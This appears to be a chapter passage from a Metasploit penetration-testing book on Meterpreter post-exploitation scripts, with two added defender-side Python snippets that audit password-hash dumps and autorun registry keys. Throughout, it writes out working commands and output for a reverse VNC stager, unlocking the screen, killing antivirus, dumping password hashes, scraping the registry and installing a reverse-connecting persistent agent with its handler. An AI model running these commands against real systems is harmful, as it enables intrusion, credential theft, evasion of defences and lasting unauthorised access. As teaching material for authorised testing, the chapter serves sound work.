Several external Meterpreter scripts can help you to enumerate a system or perform predefined tasks inside the Meterpreter shell. We won’t cover every script here, but we will mention a few of the most notable ones.
The Meterpreter scripts are in the process of being moved to post exploitation modules. We’ll cover both scripts and post exploitation modules in this chapter.
To run a script from the Meterpreter console, enter run scriptname. The script will either execute or provide additional help on how to run it.
Should you want to use an interactive remote GUI on the system, you can use the VNC protocol to tunnel the active desktop communications and interact with the GUI desktop on the target machine. But in some cases, the system may be locked and you may be unable to access it. Never fear: Metasploit has us covered.
In the following example, we issue the run vnc command, which installs a VNC session on the remote system. From there, we launch run screen_unlock to unlock the target machine so that we can view the desktop. As a result, a VNC window should appear, showing us the target desktop.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)
This will give us a VNC graphical interface to the target machine and allow us to interact through a desktop.
meterpreter > run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!
Often, when we are attacking a system and exploiting a service such as Internet Explorer, if the target user closes the browser, the Meterpreter session is also closed and we lose our connection to the target. To avoid this problem, we can use the migrate post exploitation module, shown next, to move the Meterpreter server into the memory space of a process that won’t close when the target closes the browser. By migrating to a different, more stable process, we ensure that the process isn’t closed and we maintain our connection to the system.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
Antivirus software can block certain tasks. During penetration tests, we have seen “smarter” antivirus or host-based intrusion prevention products block our ability to run certain attack vectors. In such cases, we can run the killav script to stop the processes preventing our tasks from running.
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
Obtaining a copy of the system’s password hashes allows us to run pass-the-hash attacks or to brute force the hash to reveal the plain-text password. We can obtain the password hashes with the run hashdump command:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
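As an added, defender-side example (not code from the book or from Metasploit), the following Python parses hashdump output in the user:RID:LM:NT::: form shown above and flags the conditions a defender should fix afterwards: LM hashes still being stored, blank passwords, and the built-in Administrator account appearing in the dump. The Guest and svc_backup lines and their hash values are constructed sample data.

```python
import re
from dataclasses import dataclass, field

# Well-known sentinel hashes in pwdump-style output (user:RID:LM:NT:::).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

@dataclass
class Finding:
    user: str
    rid: int
    issues: list = field(default_factory=list)

def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples; Meterpreter's [*] status lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("[*]"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        records.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return records

def audit(records):
    """Flag what a defender should remediate after such a dump is obtained."""
    findings = []
    for user, rid, lm, nt in records:
        f = Finding(user, rid)
        if lm != EMPTY_LM:
            f.issues.append("LM hash stored: enforce NoLMHash, LM hashes are trivially recovered")
        if nt == EMPTY_NT:
            f.issues.append("blank password")
        if rid == 500:
            f.issues.append("built-in Administrator (RID 500): use a unique local admin password per host")
        if f.issues:
            findings.append(f)
    return findings

# Constructed sample: the Administrator line from the listing above plus two made-up accounts.
SAMPLE = """[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
```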
To see all traffic on a target, we can run a packet recorder. Everything captured by packetrecorder is saved in the .pcap file format to be parsed with a tool such as Wireshark.
In this listing, we run the packetrecorder script with the -i 1 option, which specifies which interface we want to use to perform the packet captures:
meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture started
The scraper script enumerates just about everything you could ever want from a system. It will grab the usernames and passwords, download the entire registry, dump password hashes, gather system information, and export the HKEY_CURRENT_USER (HKCU) hive.
meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)
Meterpreter’s persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If it’s a bind, you can have it attempt to bind on an interface at a given time.
If you use this functionality, be sure that you remove it after you’re done. If you forget to do this, any attacker can also gain access to the system without authentication!
In the following listing, we run persistence and tell Windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) before connection retries, run on port 443 (-p 443), and connect to IP 192.168.33.129. We then establish a listener for the agent with use multi/handler, and after setting a couple of options and running exploit, we see that the connection comes in as expected.
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)
As of this writing, the only way to remove the Meterpreter agent is to delete the registry entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ and remove the VBScript located in C:\WINDOWS\TEMP\. Be sure to document the registry keys and locations (such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc) to remove them manually. Generally, you can do this through Meterpreter or drop to a shell and remove it that way. If you feel more comfortable using a GUI, you can use run vnc and remove the script with regedit. (Note that the registry keys will change each time, so make sure that you document where Metasploit adds the registry keys.)
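Because the Run value name and the script file name change on every run, auditing the autorun keys is the reliable way to find what persistence left behind, whether during your own cleanup or on a host you are checking. As an added example (not from the book or Metasploit), this Python reads a .reg export of the Run keys and reports values that launch a script from a temp directory, returning exactly the key, value name and target path that need to be removed. The .reg text is a constructed sample in the layout regedit exports, using the value name and path from the listing above plus a benign made-up entry.

```python
import re

# Autorun keys the persistence script writes to (compared case-insensitively).
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}
SCRIPT_EXT = (".vbs", ".js", ".bat", ".cmd", ".ps1")
TEMP_MARKERS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")

def _unescape(s):
    # .reg files double backslashes and escape embedded quotes (simplified unescape).
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg_export(text):
    """Yield (key, value_name, data) for each REG_SZ value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = re.match(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', line)
            if m:
                yield key, _unescape(m.group(1)), _unescape(m.group(2))

def suspicious_autoruns(text):
    """Return Run-key values whose target looks like a dropped script in a temp directory."""
    findings = []
    for key, name, data in parse_reg_export(text):
        if key.lower() not in RUN_KEYS:
            continue
        target = data.strip('"').lower()
        reasons = []
        if any(marker in target for marker in TEMP_MARKERS):
            reasons.append("launches from a temp directory")
        if target.endswith(SCRIPT_EXT):
            reasons.append("autorun target is a script file")
        if reasons:
            findings.append({"key": key, "value": name, "target": data, "reasons": reasons})
    return findings

# Constructed sample export: the persistence entry from the listing plus a benign value.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"xEYnaHedooc"="C:\\WINDOWS\\TEMP\\asSnqrlUDRwO.vbs"
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
'''
```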